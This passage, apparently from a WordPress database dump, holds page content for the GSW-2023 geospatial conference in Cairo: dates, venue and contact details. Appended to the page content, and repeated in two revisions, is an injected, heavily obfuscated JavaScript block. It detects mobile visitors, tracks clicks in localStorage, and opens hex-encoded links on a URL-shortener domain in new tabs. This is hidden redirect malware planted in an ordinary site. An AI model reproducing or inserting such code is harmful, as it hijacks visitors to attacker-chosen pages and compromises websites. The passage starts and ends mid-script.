_0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 20:40:04','2022-11-09 20:40:04','',3066,'https://gsw2023.com/?p=3218',0,'revision','',0),
(3219,1,'2022-11-09 20:42:12','2022-11-09 20:42:12','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 